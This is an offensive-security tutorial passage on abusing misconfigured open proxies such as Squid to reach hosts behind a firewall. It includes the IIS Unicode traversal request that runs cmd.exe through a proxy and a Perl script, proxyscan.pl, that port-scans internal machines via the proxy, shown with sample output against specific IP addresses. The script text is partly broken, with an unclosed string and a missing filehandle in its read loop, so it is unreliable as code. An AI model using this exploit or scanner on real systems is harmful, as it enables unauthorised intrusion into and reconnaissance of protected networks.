Proxies (80,1080,3128,8080 TCP)

Proxies (80,1080,3128,8080 TCP)
A proxy is used to relay HTTP and HTTPs connection - if you don't know what a proxy is you should not be reading any of this. If we find a proxy port open on a host it excites us because it could be used to access other webservers that are located behind a firewall if not configured correctly. Just in the same way that your proxy server allows you to connect to it and surf sites that are located on the outside of your server, a victim's proxy server could serve as a gateway to reach machines that are normally not accessible. As example - a firewall is protecting the 196.xxx.201.0/24 network. The intranet server is located on 196.xxx.201.10, but the firewall prohibits communication to port 80 (or 443). Port 3128 on 196.xxx.201.5 is open, and the Squid proxy is not set up correctly (it allows anyone to connect to it). Change your proxy properties in your local browser to point to 196.xxx.201.5 and hit 196.xxx.201.10 and access the intranet server.
You can even run an exploit over a proxy. The only difference in reaching the machine direct and via a proxy is that the full URL needs to be send, e.g.:
Without proxy (for example Unicode exploit):
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
With proxy:
GET http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
You will need to make some changes to your exploit's code, but generally it wouldn't need to be difficult. Remember to point your exploit to the proxy address and port!
You could even use a proxy as a very primitive portscanner. By requesting a URL on a different port - say GET http://victim:port/ HTTP/1.0 you might get a different response. Some proxies - such as Squid - does not even try to pass traffic with a destination port lower then 1024 (other than 70,80, and 443). Traffic directed to ports higher than 1024 is allowed - by interpreting responses from the proxy we can find out if the port is open or closed. Hereby a simple PERL script that works OK with Squid:
---proxyscan.pl---
#!/usr/bin/perl
use Socket;
if ($#ARGV<0) {die "Usage: proxyscan.pl proxyIP:port:scanIP:beginrange:endrange
($host,$port,$scanIP,$br,$er)=split(/:/,@ARGV[0]);
print "Testing $scanIP via $host:$port:\n";
$target = inet_aton($host);
for ($mp=$br; $mp <= $er; $mp++) {
my @results=sendraw("GET http://$scanIP:$mp/ HTTP/1.0\r\n\r\n");
#system "sleep 2";
foreach $line (@results){
if ($line =~ /refused/) {print "Port $mp on $scanIP is closed\n"}
if ($line =~ /Zero/) {print "Port $mp on $scanIP is open\n"}
}
}
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata
> perl proxyscan.pl 160.124.19.103:3128:160.124.19.98:5999:6002
Testing 160.124.19.98 via 160.124.19.103:3128:
Port 5999 on 160.124.19.98 is closed